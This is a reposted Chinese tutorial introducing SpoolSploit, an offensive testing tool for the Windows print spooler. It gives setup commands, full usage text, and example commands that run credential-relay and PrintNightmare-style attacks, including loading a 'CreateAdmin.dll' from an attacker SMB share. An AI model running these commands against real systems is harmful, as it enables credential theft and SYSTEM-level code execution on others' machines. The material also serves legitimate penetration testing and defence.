栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 网络安全 > Web安全

如何使用SpoolSploit审查Windows打印后台处理程序的安全性

Web安全 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力



关于SpoolSploit

SpoolSploit是一款针对Windows打印后台处理程序(print spooler)的安全审计工具,广大研究人员可以使用SpoolSploit检测Windows打印后台处理程序(print spooler)中存在的安全漏洞,并通过实际的利用技术来进行渗透测试或安全审计。

SpoolSploit中还封装了很多其他的实用工具,以便进行实际的漏洞利用和渗透测试。并实现了两种方法来中继计算机帐户凭据,以升级权限并在具有完全系统访问权限的节点上执行恶意DLL。

快速开始

自该项目发布之日起,SpoolSploit Docker容器已在最新版本的macOS、Ubuntu Linux和Windows 10上成功测试。

我们建议广大用户在SpoolSploit Docker容器内执行渗透测试或凭据中继测试,并托管相应的DLL文件,然后确保运行Docker容器的主机上开启并未使用的445端口。在Windows主机上运行此容器时,这种情况最为普遍,因为默认情况下它使用的是端口445。如果你的主机上端口445已被占用或无法使用的话,可以在网桥模式下配置了网络适配器的虚拟机中运行Docker容器即可。

(1) 工具下载&访问SpoolSploit容器

首先,使用下列命令将该项目源码克隆至本地:

git clone https://github.com/BeetleChunks/SpoolSploit 

接下来,构建SpoolSploit Docker容器镜像:

cd SpoolSploit 
  •  sudo docker build -t spoolsploit . 
  • 创建并启动SpoolSploit Docker容器:

    sudo docker run -dit -p 445:445 --name spoolsploit spoolsploit:latest 

    绑定容器:

    sudo docker exec -it spoolsploit /bin/bash 

    (2) 命令行使用

    usage: spool_sploit.py [-h] -a {spoolsample,nightmare} -rH RHOST -rP {139,445} [-lH LHOST] [-lS LSHARE] -d DOMAIN -u USER -p PASSWD 
  •  optional arguments: 
  •    -h, --help               显示帮助信息并退出 
  •    -a {spoolsample,nightmare}, --attack {spoolsample,nightmare} 
  •                          需要在目标主机上执行的测试类型 
  •    -rH RHOST, --rhost RHOST 
  •                          远程目标IP、CIDR范围或文件名 (file:
  •    -rP {139,445}, --rport {139,445} 
  •                          远程SMB服务器端口 
  •    -lH LHOST, --lhost LHOST 
  •                          监听主机名或IP地址 
  •    -lS LSHARE, --lshare LSHARE 
  •                          SMB共享 (UNC) 
  •    -d DOMAIN, --domain DOMAIN 
  •                          身份认证域名 
  •    -u USER, --username USER 
  •                          身份认证用户名 
  •    -p PASSWD, --password PASSWD 
  •                          身份认证密码 
  • 工机使用样例

    使用样例1:

    python3 spool_sploit.py -a spoolsample -lH 10.14.1.24 -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

    使用样例2:

    python3 spool_sploit.py -a nightmare -lS '\10.14.1.24C$CreateAdmin.dll' -d evil.corp -u rjmcdow -p 'P4ssword123!' -rP 445 -rH 10.5.1.10 

    SpoolSample - Windows设备账号凭证获取和中继



    sudo docker cp ./malicious.dll spoolsploit:/home/dlogmas/smbserver/share/ 
  •  sudo docker exec spoolsploit /bin/sh -c 'sudo chown dlogmas:dlogmas /home/dlogmas/smbserver/share/malicious.dll' 


  • 工具使用截图



    项目地址

    SpoolSploit:【GitHub传送门】

     

     

    转载请注明:文章转载自 www.mshxw.com
    本文地址:https://www.mshxw.com/it/823941.html
    我们一直用心在做
    关于我们 文章归档 网站地图 联系我们

    版权所有 (c)2021-2022 MSHXW.COM

    ICP备案号:晋ICP备2021003244-6号